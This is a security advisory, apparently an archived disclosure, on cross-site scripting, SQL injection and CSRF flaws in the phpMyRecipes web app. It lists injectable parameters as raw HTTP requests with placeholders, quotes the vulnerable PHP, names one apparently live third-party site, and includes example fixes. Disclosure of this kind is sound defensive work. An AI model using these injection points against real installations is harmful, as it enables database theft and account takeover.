phpMyRecipes 1.x.x XSS / CSRF / SQL Injection
Posted Dec 20, 2013
Authored by Rafay Baloch, Sikandar Ali

phpMyRecipes version 1.x.x suffers from cross site request forgery, cross site scripting, and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection, csrf
SHA-256 | 717dd33446428aed6b6a79a2fadd94fc507d0138e82b80c3ab389ab431f81f92

#Product: phpMyRecipes version 1.x.x
#Vulnerability: Multiple SQL Injection, XSS and CSRF Vulnerabilities
#Impact: High
#Authors: Rafay Baloch And Sikandar Ali
#Company: RHAinfoSEC
#Website: http://rhainfosec.com

Introduction
============

"PhpMyRecipes is a simple application for storing and retrieving recipes. It uses a web-based interface, for ease of use across any system, and a MySQL database backend for storing the recipes."

Description
===========

We performed both whitebox and blackbox testing of phpMyRecipes and found a large number of high-risk vulnerabilities.

The application is poorly coded from a security perspective: it offers no filtering mechanism of any kind to separate normal input from malicious input.

Vulnerabilities
===============

Several high-risk vulnerabilities, including SQL injection and XSS, were discovered. We have provided the vulnerable code for some of them. Full details have been sent to the vendor so that patches can be applied accordingly.


Multiple Cross Site Scripting Vulnerabilities
=============================================

Multiple XSS vulnerabilities were found: user input was not sanitised before being returned to the user. It is advised to filter all special characters before displaying input back to the user.

Details And POC's
=================

1) http://target.com?r_id=[XSS]

2) http://target.com/ingredients/ingredients.php?from=[XSS]

3) http://target.com/login.php

REQUEST
=======

POST /login.php HTTP/1.1
Content-Length: 89
Content-Type: application/x-www-form-urlencoded
Referer: http://target.com
Host: target.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

password=Uname&username=[XSS]


4) http://recipes.delattre.ca/domenusearch.php

REQUEST
=======

POST /domenusearch.php HTTP/1.1
Content-Length: 194
Content-Type: application/x-www-form-urlencoded
Referer: http://target.com
Host: Target.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

r_acategory[]=5[XSS]&r_arecipes[]=0&r_days=17&r_dcategory[]=5&r_drecipes[]=0&r_mcategory[]=5&r_mrecipes[]=0&r_servings=1&r_step=2

All POST parameters were found vulnerable to XSS.

5) http://target.com/register.php


REQUEST
=======

POST /register.php HTTP/1.1
Content-Length: 158
Content-Type: application/x-www-form-urlencoded
Referer: http://target.com
Host: target.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

email=aa@gmail.com[XSS]&name=XSS&password1=XSS&password2=XSS&username=XSS


#Note: All parameters were found vulnerable to Cross Site Scripting.
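The XSS findings above all come from echoing request values back into HTML unencoded. As an added illustration (not code from the advisory or from phpMyRecipes), here is how a login form that re-displays the submitted username, the pattern behind POC 3, would render it safely by encoding every value for the context it lands in. The helper name e() and the form markup are assumptions.

```php
<?php
// Added example: context-aware output encoding for a login form that
// re-displays the submitted username (the pattern behind POC 3 above).
// The helper name e() and the form markup are assumptions, not phpMyRecipes code.

// Encode for an HTML text node or a double-quoted attribute value.
// ENT_QUOTES covers both ' and " so a value cannot close the attribute it sits in;
// ENT_SUBSTITUTE avoids returning an empty string on invalid UTF-8.
function e(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Read the raw submitted value. Do not try to "clean" it here: store and
// compare the real value, and encode it at the moment it is written into HTML.
$username = isset($_POST['username']) ? (string) $_POST['username'] : '';
$error    = isset($_POST['username']) ? 'Login failed, please try again.' : '';
?>
<form method="post" action="login.php">
  <?php if ($error !== '') { ?>
    <p class="error"><?= e($error) ?></p>
  <?php } ?>
  <label>Username
    <!-- value="..." is a quoted attribute: e() turns any " in the input into &quot; -->
    <input type="text" name="username" value="<?= e($username) ?>">
  </label>
  <label>Password
    <!-- a submitted password is never echoed back into the page -->
    <input type="password" name="password" value="">
  </label>
  <button type="submit">Log in</button>
</form>
```

The same e() call belongs around every request value the register.php and domenusearch.php pages print, since the advisory reports all of their parameters as reflected.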



Multiple SQL Injection Vulnerabilities
======================================

Multiple SQL injection vulnerabilities were found. User input is inserted directly into the SQL queries without any proper sanitisation or filtering.


1) http://target.com/dosearch.php

POST DATA
categories[]=1[Inject_HERE]&ingids[]=20&ing_modifier=2&name_exact=riuciyda&words_all=1&words_any=1&words_exact=1&words_without=1


2) http://target.com/ingredients/ingredients.php?from=[INJECT_HERE]


Vulnerable Code
===============

if (! empty($_POST['from'])) {
    $db_start = $_POST['from'];        // untrusted: taken from the request as-is
} elseif (! empty($_GET['from'])) {
    $db_start = $_GET['from'];         // untrusted: taken from the request as-is
} else {
    $db_start = 0;
}

<TABLE BORDER=3 WIDTH=100%>
<TR>
<TH WIDTH=85%>Ingredient</TH>
<TH COLSPAN=2>Actions</TH>
</TR>
<?php
// $db_start is concatenated straight into the LIMIT clause, so anything after
// the offset in the "from" parameter becomes part of the query
if ($result = mysql_query("SELECT id,name from ingredients ORDER BY name LIMIT $db_start, " . INGREDIENTS_PER_PAGE)) {
    while ($row = mysql_fetch_array($result)) {
?>


3) http://target.com/recipes/textrecipe.php?r_id=[INJECT_HERE]

Vulnerable Code
===============

Line 37 - 42

# Get the recipe ID to view
$r_id = $_GET['r_id'];                 // untrusted: no validation or escaping

// $r_id is interpolated directly into the WHERE clause
if (! ($result = mysql_query("SELECT name FROM recipes WHERE id=$r_id"))) {
    dberror("textrecipe.php", "Cannot select recipe");
}


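Both vulnerable snippets above splice a request value into the query text. As an added example (not code from the advisory or from phpMyRecipes), here are the ingredients.php offset and the textrecipe.php lookup rewritten so that the input is bound as a typed parameter instead. It uses mysqli prepared statements in place of the original mysql_* calls and assumes PHP 7.1+ with mysqlnd, an open connection in $db, and the INGREDIENTS_PER_PAGE constant the original code already uses.

```php
<?php
// Added example: the two vulnerable queries rewritten so user input never
// becomes part of the SQL string. mysqli, $db and the function names are
// assumptions, not phpMyRecipes code; INGREDIENTS_PER_PAGE is the original's constant.

// ingredients.php: the LIMIT offset. Only a non-negative integer makes sense,
// so cast and clamp instead of trusting $_POST / $_GET verbatim.
function ingredients_page(mysqli $db, $from): array {
    $start   = max(0, (int) $from);      // non-numeric or trailing text is discarded
    $perPage = (int) INGREDIENTS_PER_PAGE;
    $stmt = $db->prepare(
        'SELECT id, name FROM ingredients ORDER BY name LIMIT ?, ?'
    );
    $stmt->bind_param('ii', $start, $perPage);   // bound as integers, not spliced as text
    $stmt->execute();
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
}

// textrecipe.php: recipe lookup by id. With a bound parameter the whole value is
// compared against the id column; it can no longer alter the WHERE clause.
function recipe_name(mysqli $db, $r_id): ?string {
    if (!ctype_digit((string) $r_id)) {  // reject anything that is not a plain id up front
        return null;
    }
    $id   = (int) $r_id;
    $stmt = $db->prepare('SELECT name FROM recipes WHERE id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    return $row ? $row['name'] : null;
}

// Reading the parameters the way the original pages do, then calling the helpers:
$from  = $_POST['from'] ?? $_GET['from'] ?? 0;
$rows  = ingredients_page($db, $from);
$name  = recipe_name($db, $_GET['r_id'] ?? '');
if ($name === null) {
    dberror('textrecipe.php', 'Cannot select recipe');   // original's error path
}
```

The dosearch.php and domenutext.php array parameters (categories[], r_arecipes[]) need the same treatment: validate each element as an integer and bind one placeholder per element rather than imploding the array into the query.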
4) http://target.com/

REQUEST
=======

POST /domenutext.php HTTP/1.1
Content-Length: 221
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://target.com
Host: target.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

0=1&1=1&2=1&3=1&4=1&5=1&6=1&7=1&8=1&r_acategory[]=17&r_arecipes[]=[INJECT_HERE]&r_days=17&r_dcategory[]=5&r_drecipes[]=0&r_mcategory[]=5&r_mrecipes[]=0&r_servings=1&r_step=3


5) http://target.com/dosearch.php

REQUEST
=======

POST /dosearch.php HTTP/1.1
Content-Length: 127
Content-Type: application/x-www-form-urlencoded
Referer: http://target.com
Host: target.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

categories[]=[INJECT_HERE]&ingids[]=20&ing_modifier=2&name_exact=aaaaaaa&words_all=1&words_any=1&words_exact=1&words_without=1


Multiple CSRF Vulnerabilities
=============================

All forms were missing CSRF tokens, including some important ones. This would have allowed an attacker to force the victim's browser into submitting a request that could then be used to manipulate important details such as the email address or username. In our analysis, we found no CSRF tokens that would distinguish a legitimate request sent by the user from one an attacker forced the victim's browser to send.
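A per-session token is the standard fix for the missing CSRF protection described above. As an added example (not code from the advisory or from phpMyRecipes), this guards a profile form of the kind the advisory mentions, one that changes the email address or username. The function names, the form and its field names are assumptions.

```php
<?php
// Added example: per-session CSRF token for a state-changing form.
// Function names, the form and the field names are assumptions, not phpMyRecipes code.
session_start();

// Issue one random token per session; random_bytes() is a CSPRNG, so the
// token cannot be predicted by a page on another origin.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Emit the token as a hidden field (HTML-encoded, like any other output).
function csrf_field(): string {
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// Verify on every state-changing POST. hash_equals() compares in constant
// time so the check does not leak the token byte by byte through timing.
function csrf_check(array $post): bool {
    if (empty($_SESSION['csrf_token']) || !isset($post['csrf_token'])) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], (string) $post['csrf_token']);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_check($_POST)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token.');
    }
    // Only now apply the email / username change for the logged-in user.
}
?>
<form method="post" action="profile.php">
  <?= csrf_field() ?>
  <label>E-mail <input type="email" name="email"></label>
  <label>Username <input type="text" name="username"></label>
  <button type="submit">Save</button>
</form>
```

A request forged from another origin cannot carry the token, because that origin cannot read the victim's session or page, so the check fails closed; marking the session cookie SameSite adds defence in depth.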